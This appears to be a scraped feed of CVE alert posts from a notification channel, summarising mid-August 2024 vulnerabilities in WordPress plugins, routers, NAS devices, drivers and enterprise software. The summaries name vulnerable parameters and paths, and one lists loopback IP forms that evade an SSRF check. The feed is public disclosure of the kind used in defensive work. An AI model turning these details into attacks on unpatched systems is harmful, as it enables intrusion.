🚨 CVE-2024-37513Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Themewinter WPCafe allows Path Traversal.This issue affects WPCafe: from n/a through 2.2.27.🎖@cveNotify |
|
| 2024-08-16 14:37:25 |
🚨 CVE-2024-37091Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in StylemixThemes Consulting Elementor Widgets allows OS Command Injection.This issue affects Consulting Elementor Widgets: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-08-16 14:37:24 |
🚨 CVE-2024-29415The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.🎖@cveNotify |
|
| 2024-08-16 14:07:26 |
🚨 CVE-2024-31800Authentication Bypass in GNCC's GC2 Indoor Security Camera 1080P allows an attacker with physical access to gain a privileged command shell via the UART Debugging Port.🎖@cveNotify |
|
| 2024-08-16 14:07:25 |
🚨 CVE-2024-31798Identical Hardcoded Root Password for All Devices in GNCC's GC2 Indoor Security Camera 1080P allows an attacker with physical access to retrieve the root password for all similar devices🎖@cveNotify |
|
| 2024-08-16 14:07:24 |
🚨 CVE-2024-37090Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in StylemixThemes Masterstudy Elementor Widgets, StylemixThemes Consulting Elementor Widgets.This issue affects Masterstudy Elementor Widgets: from n/a through 1.2.2; Consulting Elementor Widgets: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-08-16 13:37:37 |
🚨 CVE-2024-42987Tenda FH1206 v02.03.01.35 was discovered to contain a stack overflow via the modino parameter in the fromPptpUserAdd function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-16 13:37:36 |
🚨 CVE-2024-42985Tenda FH1206 v02.03.01.35 was discovered to contain a stack overflow via the page parameter in the fromNatlimit function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-16 13:37:35 |
🚨 CVE-2024-42982Tenda FH1206 v02.03.01.35 was discovered to contain a stack overflow via the page parameter in the fromVirtualSer function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-16 13:37:32 |
🚨 CVE-2024-42981Tenda FH1206 v02.03.01.35 was discovered to contain a stack overflow via the delno parameter in the fromPptpUserSetting function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-16 13:37:31 |
🚨 CVE-2024-42978An issue in the handler function in /goform/telnet of Tenda FH1206 v02.03.01.35 allows attackers to execute arbitrary commands via a crafted HTTP request.🎖@cveNotify |
|
| 2024-08-16 13:37:30 |
🚨 CVE-2024-42976Tenda FH1206 v02.03.01.35 was discovered to contain a stack overflow via the page parameter in the fromSafeClientFilter function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-16 13:37:26 |
🚨 CVE-2024-42967Incorrect access control in TOTOLINK LR350 V9.3.5u.6369_B20220309 allows attackers to obtain the apmib configuration file, which contains the username and the password, via a crafted request to /cgi-bin/ExportSettings.sh.🎖@cveNotify |
|
| 2024-08-16 13:37:25 |
🚨 CVE-2024-42947An issue in the handler function in /goform/telnet of Tenda FH1201 v1.2.0.14 (408) allows attackers to execute arbitrary commands via a crafted HTTP request.🎖@cveNotify |
|
| 2024-08-16 13:37:24 |
🚨 CVE-2024-38135Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-16 11:37:25 |
🚨 CVE-2024-7146The JetTabs for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.3 via the 'switcher_preset' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-08-16 11:37:24 |
🚨 CVE-2024-7136The JetSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-16 10:37:24 |
🚨 CVE-2024-25008Ericsson RAN Compute and Site Controller 6610 contains a vulnerability in the Control System where Improper Input Validation can lead to arbitrary code execution, for example to obtain a Linux Shell with the same privileges as the attacker. The attacker would require elevated privileges for example a valid OAM user having the system administrator role to exploit the vulnerability.🎖@cveNotify |
|
| 2024-08-16 08:37:25 |
🚨 CVE-2024-7263Improper path validation in promecefpluginhost.exe in Kingsoft WPS Office version ranging from 12.2.0.13110 to 12.2.0.17153 (exclusive) on Windows allows an attacker to load an arbitrary Windows library.The patch released in version 12.2.0.16909 to mitigate CVE-2024-7262 was not restrictive enough. Another parameter was not properly sanitized which leads to the execution of an arbitrary Windows library.🎖@cveNotify |
|
| 2024-08-16 08:37:24 |
🚨 CVE-2024-7262Improper path validation in promecefpluginhost.exe in Kingsoft WPS Office version ranging from 12.2.0.13110 to 12.2.0.13489 (inclusive) on Windows allows an attacker to load an arbitrary Windows library.The vulnerability was found weaponized as a single-click exploit in the form of a deceptive spreadsheet document🎖@cveNotify |
|
| 2024-08-16 07:37:25 |
🚨 CVE-2024-7501The Download Plugins and Themes in ZIP from Dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.7. This is due to missing or incorrect nonce validation on the download_theme() function. This makes it possible for unauthenticated attackers to download arbitrary themes from the website via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. In versions prior to 1.8.6 it was possible to download the entire sites files.🎖@cveNotify |
|
| 2024-08-16 07:37:24 |
🚨 CVE-2024-32673Improper Validation of Array Index vulnerability in Samsung Open Source Walrus Webassembly runtime engine allows a segmentation fault issue.This issue affects Walrus: before 72c7230f32a0b791355bbdfc78669701024b0956.🎖@cveNotify |
|
| 2024-08-16 06:37:25 |
🚨 CVE-2024-6460The Grow by Tradedoubler WordPress plugin through 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.🎖@cveNotify |
|
| 2024-08-16 05:37:25 |
🚨 CVE-2024-7301The WordPress File Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.24.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-08-16 04:37:24 |
🚨 CVE-2024-7422The Theme My Login plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.1.7. This is due to missing or incorrect nonce validation on the tml_admin_save_ms_settings() function. This makes it possible for unauthenticated attackers to update the theme's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note that this only affects multi-site instances.🎖@cveNotify |
|
| 2024-08-16 03:37:25 |
🚨 CVE-2023-7049The Custom Field For WP Job Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2 via the the 'cm_fieldshow' shortcode due to missing validation on the 'job_id' user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to expose potentially sensitive post metadata.🎖@cveNotify |
|
| 2024-08-16 03:37:24 |
🚨 CVE-2022-3399The Cookie Notice & Compliance for GDPR / CCPA plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cookie_notice_options[refuse_code_head]' parameter in versions up to, and including, 2.4.17.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrative privileges and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected /wp-admin/admin.php?page=cookie-notice page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-08-16 02:37:32 |
🚨 CVE-2024-7849** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. This affects the function cgi_create_album of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument current_path leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-16 02:37:26 |
🚨 CVE-2024-7845A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /tracking/admin/fetch_it.php. The manipulation of the argument request leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-16 02:37:25 |
🚨 CVE-2024-43370gettext.js is a GNU gettext port for node and the browser. There is a cross-site scripting (XSS) injection if `.po` dictionary definition files are corrupted. This vulnerability has been patched in version 2.0.3. As a workaround, control the origin of the definition catalog to prevent the use of this flaw in the definition of plural forms.🎖@cveNotify |
|
| 2024-08-16 02:37:24 |
🚨 CVE-2024-43369Ibexa RichText Field Type is a Field Type for supporting rich formatted text stored in a structured XML format. In versions on the 4.6 branch prior to 4.6.10, the validator for the RichText fieldtype blocklists `javascript:` and `vbscript:` in links to prevent XSS. This can leave other options open, and the check can be circumvented using upper case. Content editing permissions for RichText content is required to exploit this vulnerability, which typically means Editor role or higher. The fix implements an allowlist instead, which allows only approved link protocols. The new check is case insensitive. Version 4.6.10 contains a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-08-16 01:07:24 |
🚨 CVE-2024-28986SolarWinds Web Help Desk was found to be susceptible to a Java Deserialization Remote Code Execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. While it was reported as an unauthenticated vulnerability, SolarWinds has been unable to reproduce it without authentication after thorough testing. However, out of an abundance of caution, we recommend all Web Help Desk customers apply the patch, which is now available.🎖@cveNotify |
|
| 2024-08-15 22:37:32 |
🚨 CVE-2024-0092NVIDIA GPU Driver for Windows and Linux contains a vulnerability where an improper check or improper handling of exception conditions might lead to denial of service.🎖@cveNotify |
|
| 2024-08-15 22:37:26 |
🚨 CVE-2024-0091NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where a user can cause an untrusted pointer dereference by executing a driver API. A successful exploit of this vulnerability might lead to denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2024-08-15 22:37:25 |
🚨 CVE-2023-21351In multiple locations, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-15 22:37:24 |
🚨 CVE-2023-20971In removePermission of PermissionManagerServiceImpl.java, there is a possible way to obtain dangerous permissions without user consent due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-15 22:07:26 |
🚨 CVE-2024-0085NVIDIA vGPU software for Windows and Linux contains a vulnerability where unprivileged users could execute privileged operations on the host. A successful exploit of this vulnerability might lead to data tampering, escalation of privileges, and denial of service.🎖@cveNotify |
|
| 2024-08-15 22:07:25 |
🚨 CVE-2024-28024A vulnerability exists in the FOXMAN-UN/UNEM in which sensitive information is stored in cleartext within a resource that might be accessible to another control sphere.🎖@cveNotify |
|
| 2024-08-15 22:07:24 |
🚨 CVE-2024-28022A vulnerability exists in the FOXMAN-UN/UNEM server / APIGateway that if exploited allows a malicious user to perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account.🎖@cveNotify |
|
| 2024-08-15 21:37:37 |
🚨 CVE-2024-28623RiteCMS v3.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component main_menu/edit_section.🎖@cveNotify |
|
| 2024-08-15 21:37:31 |
🚨 CVE-2024-25327Cross Site Scripting (XSS) vulnerability in Justice Systems FullCourt Enterprise v.8.2 allows a remote attacker to execute arbitrary code via the formatCaseNumber parameter of the Citation search function.🎖@cveNotify |
|
| 2024-08-15 21:37:30 |
🚨 CVE-2024-27680Flusity-CMS v2.33 is vulnerable to Cross Site Scripting (XSS) in the "Contact form."🎖@cveNotify |
|
| 2024-08-15 21:37:29 |
🚨 CVE-2024-25438A cross-site scripting (XSS) vulnerability in the Submission module of Pkp Ojs v3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Input subject field under the Add Discussion function.🎖@cveNotify |
|
| 2024-08-15 21:37:26 |
🚨 CVE-2024-24512Cross Site Scripting vulnerability in Pkp OJS v.3.4 allows an attacker to execute arbitrary code via the input subtitle component.🎖@cveNotify |
|
| 2024-08-15 21:37:25 |
🚨 CVE-2024-25875A cross-site scripting (XSS) vulnerability in the Header module of Enhavo CMS v0.13.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Undertitle text field.🎖@cveNotify |
|
| 2024-08-15 21:37:24 |
🚨 CVE-2024-24474QEMU before 8.2.0 has an integer underflow, and resultant buffer overflow, via a TI command when an expected non-DMA transfer length is less than the length of the available FIFO data. This occurs in esp_do_nodma in hw/scsi/esp.c because of an underflow of async_len.🎖@cveNotify |
|
| 2024-08-15 21:07:26 |
🚨 CVE-2024-38197Microsoft Teams for iOS Spoofing Vulnerability🎖@cveNotify |
|
| 2024-08-15 21:07:25 |
🚨 CVE-2024-38195Azure CycleCloud Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-15 21:07:24 |
🚨 CVE-2024-38191Kernel Streaming Service Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-15 20:37:43 |
🚨 CVE-2024-7838A vulnerability was found in itsourcecode Online Food Ordering System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /addcategory.php. The manipulation of the argument cname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 20:37:42 |
🚨 CVE-2024-38211Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability🎖@cveNotify |
|
| 2024-08-15 20:37:41 |
🚨 CVE-2024-38201Azure Stack Hub Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-15 20:37:38 |
🚨 CVE-2024-38199Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-15 20:37:37 |
🚨 CVE-2024-24506Cross Site Scripting (XSS) vulnerability in Lime Survey Community Edition Version v.5.3.32+220817, allows remote attackers to execute arbitrary code via the Administrator email address parameter in the General Setting function.🎖@cveNotify |
|
| 2024-08-15 20:37:36 |
🚨 CVE-2024-30632Tenda FH1205 v2.0.0.7(775) has a stack overflow vulnerability in the security_5g parameter from formWifiBasicSet function.🎖@cveNotify |
|
| 2024-08-15 20:37:32 |
🚨 CVE-2024-29374A Cross-Site Scripting (XSS) vulnerability exists in the way MOODLE 3.10.9 handles user input within the "GET /?lang=" URL parameter.🎖@cveNotify |
|
| 2024-08-15 20:37:31 |
🚨 CVE-2024-28683DedeCMS v5.7 was discovered to contain a cross-site scripting (XSS) vulnerability via create file.🎖@cveNotify |
|
| 2024-08-15 20:37:30 |
🚨 CVE-2024-28670DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/freelist_main.php.🎖@cveNotify |
|
| 2024-08-15 20:07:33 |
🚨 CVE-2024-40704IBM InfoSphere Information Server 11.7 could allow a privileged user to obtain sensitive information from authentication request headers. IBM X-Force ID: 298277.🎖@cveNotify |
|
| 2024-08-15 19:37:46 |
🚨 CVE-2024-42948Tenda FH1201 v1.2.0.14 (408) was discovered to contain a stack overflow via the delno parameter in the fromPptpUserSetting function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-15 19:37:45 |
🚨 CVE-2024-42944Tenda FH1201 v1.2.0.14 (408) was discovered to contain a stack overflow via the page parameter in the fromNatlimit function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-15 19:37:41 |
🚨 CVE-2024-42941Tenda FH1201 v1.2.0.14 (408) was discovered to contain a stack overflow via the wanmode parameter in the fromAdvSetWan function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2024-08-15 19:37:40 |
🚨 CVE-2024-36604Tenda O3V2 v1.0.0.12(3880) was discovered to contain a Blind Command Injection via stpEn parameter in the SetStp function. This vulnerability allows attackers to execute arbitrary commands with root privileges.🎖@cveNotify |
|
| 2024-08-15 19:37:39 |
🚨 CVE-2024-22270VMware Workstation and Fusion contain an information disclosure vulnerability in the Host Guest File Sharing (HGFS) functionality. A malicious actor with local administrative privileges on a virtual machine may be able to read privileged information contained in hypervisor memory from a virtual machine.🎖@cveNotify |
|
| 2024-08-15 19:37:36 |
🚨 CVE-2024-29857An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.🎖@cveNotify |
|
| 2024-08-15 19:37:35 |
🚨 CVE-2024-28519A kernel handle leak issue in ProcObsrvesx.sys 4.0.0.49 in MicroWorld Technologies Inc eScan Antivirus could allow privilege escalation for low-privileged users.🎖@cveNotify |
|
| 2024-08-15 19:37:34 |
🚨 CVE-2019-19755ethOS through 1.3.3 ships with SSH host keys baked into the installation image, which allows man-in-the-middle attacks and makes identification of all public IPv4 nodes trivial with Shodan.io. NOTE: as of 2019-12-01, the vendor indicated that they plan to fix this.🎖@cveNotify |
|
| 2024-08-15 19:37:33 |
🚨 CVE-2024-32358An issue in Jpress v.5.1.0 allows a remote attacker to execute arbitrary code via a crafted script to the custom plug-in module function.🎖@cveNotify |
|
| 2024-08-15 19:37:30 |
🚨 CVE-2024-30840A Stack Overflow vulnerability in Tenda AC15 v15.03.05.18 allows attackers to cause a denial of service via the LISTEN parameter in the fromDhcpListClient function.🎖@cveNotify |
|
| 2024-08-15 19:37:29 |
🚨 CVE-2024-28718An issue in OpenStack magnum yoga-eom version allows a remote attacker to execute arbitrary code via the cert_manager.py. component.🎖@cveNotify |
|
| 2024-08-15 19:07:34 |
🚨 CVE-2024-7343A vulnerability was found in Baidu UEditor 1.4.2. It has been declared as problematic. This vulnerability affects unknown code of the file /ueditor142/php/controller.php?action=catchimage. The manipulation of the argument source[] leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-15 19:07:33 |
🚨 CVE-2024-7326A vulnerability classified as critical has been found in IObit DualSafe Password Manager 1.4.0.3. This affects an unknown part in the library RTL120.BPL of the component BPL Handler. The manipulation leads to uncontrolled search path. It is possible to launch the attack on the local host. The identifier VDB-273249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-15 18:37:44 |
🚨 CVE-2024-34211TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a hardcoded password vulnerability in /etc/shadow.sample, which allows attackers to log in as root.🎖@cveNotify |
|
| 2024-08-15 18:37:37 |
🚨 CVE-2024-22054A malformed discovery packet sent by a malicious actor with preexisting access to the network could interrupt the functionality of device management and discovery.Affected Products:UniFi Access PointsUniFi SwitchesUniFi LTE BackupUniFi Express (Only Mesh Mode, Router mode is not affected) Mitigation:Update UniFi Access Points to Version 6.6.55 or later.Update UniFi Switches to Version 6.6.61 or later.Update UniFi LTE Backup to Version 6.6.57 or later.Update UniFi Express to Version 3.2.5 or later.🎖@cveNotify |
|
| 2024-08-15 18:37:36 |
🚨 CVE-2023-40114In multiple functions of MtpFfsHandle.cpp , there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-08-15 15:37:46 |
🚨 CVE-2024-7262Improper path validation in promecefpluginhost.exe in Kingsoft WPS Office version ranging from 12.2.0.13110 to 12.2.0.13489 on Windows allows an attacker to load an arbitrary Windows library.Using the MHTML format allows an attacker to automatically deliver a malicious library on opening the document and a single user click on a crafted hyperlink leads to the execution of the library.🎖@cveNotify |
|
| 2024-08-15 15:37:45 |
🚨 CVE-2024-6347* Unprotected privileged mode access through UDS session in the Blind Spot Detection Sensor ECU firmware in Nissan Altima (2022) allows attackers to trigger denial-of-service (DoS) by unauthorized access to the ECU's programming session. * No preconditions implemented for ECU management functionality through UDS session in the Blind Spot Detection Sensor ECU in Nissan Altima (2022) allows attackers to disrupt normal ECU operations by triggering a control command without authentication.🎖@cveNotify |
|
| 2024-08-15 15:37:41 |
🚨 CVE-2024-43373webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1.🎖@cveNotify |
|
| 2024-08-15 15:37:40 |
🚨 CVE-2024-7831** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814 and classified as critical. Affected by this vulnerability is the function cgi_get_cooliris of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument path leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-15 15:37:39 |
🚨 CVE-2024-7715** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240812. It has been classified as critical. This affects the function sprintf of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument filter leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-15 15:37:35 |
🚨 CVE-2024-32901In v4l2_smfc_qbuf of smfc-v4l2-ioctls.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-15 15:37:34 |
🚨 CVE-2024-33228An issue in the component segwindrvx64.sys of Insyde Software Corp SEG Windows Driver v100.00.07.02 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests.🎖@cveNotify |
|
| 2024-08-15 15:37:33 |
🚨 CVE-2024-21114Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-08-15 15:37:30 |
🚨 CVE-2024-21110Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-08-15 15:37:29 |
🚨 CVE-2024-21107Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 6.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-08-15 15:37:28 |
🚨 CVE-2024-28066In Unify CP IP Phone firmware 1.10.4.3, Weak Credentials are used (a hardcoded root password).🎖@cveNotify |
|
| 2024-08-15 15:37:27 |
🚨 CVE-2024-28741Cross Site Scripting vulnerability in EginDemirbilek NorthStar C2 v1 allows a remote attacker to execute arbitrary code via the login.php component.🎖@cveNotify |
|
| 2024-08-15 15:07:25 |
🚨 CVE-2024-4187Stored XSS vulnerability has been discovered in OpenText™ Filr product, affecting versions 24.1.1 and 24.2. The vulnerability could cause users to not be warned when clicking links to external sites.🎖@cveNotify |
|
| 2024-08-15 15:07:24 |
🚨 CVE-2024-6392The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to unauthorized plugin settings modification due to missing capability checks on the plugin functions in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the connected Sirv account to an attacker-controlled one.🎖@cveNotify |
|
| 2024-08-15 14:37:43 |
🚨 CVE-2024-7832** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814 and classified as critical. Affected by this issue is the function cgi_get_fullscreen_photos of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument user leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-15 14:37:42 |
🚨 CVE-2024-42679SQL Injection vulnerability in Super easy enterprise management system v.1.0.0 and before allows a local attacker to execute arbitrary code via a crafted script to the/ajax/Login.ashx component.🎖@cveNotify |
|
| 2024-08-15 14:37:38 |
🚨 CVE-2024-42678Cross Site Scripting vulnerability in Super easy enterprise management system v.1.0.0 and before allows a local attacker to execute arbitrary code via a crafted script to the /WebSet/DlgGridSet.html component.🎖@cveNotify |
|
| 2024-08-15 14:37:37 |
🚨 CVE-2024-7829** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. This issue affects the function cgi_del_photo of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument current_path leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-15 14:37:36 |
🚨 CVE-2024-33960SQL injection vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could exploit this vulnerability by sending a specially crafted query to the server and retrieve all the information stored in it through the following 'end' in '/admin/mod_reports/printreport.php' parameter.🎖@cveNotify |
|
| 2024-08-15 14:37:32 |
🚨 CVE-2024-33980Cross-Site Scripting (XSS) vulnerability in PayPal, Credit Card and Debit Card Payment affecting version 1.0. An attacker could create a specially crafted URL and send it to a victim to obtain details of their session cookie via the 'start' parameter in '/admin/mod_reports/printreport.php'.🎖@cveNotify |
|
| 2024-08-15 14:37:31 |
🚨 CVE-2024-41258An issue was discovered in filestash v0.4. The usage of the ssh.InsecureIgnoreHostKey() disables host key verification, possibly allowing attackers to obtain sensitive information via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-08-15 14:37:30 |
🚨 CVE-2024-41256Default configurations in the ShareProofVerifier function of filestash v0.4 causes the application to skip the TLS certificate verification process when sending out email verification codes, possibly allowing attackers to access sensitive data via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-08-15 14:37:26 |
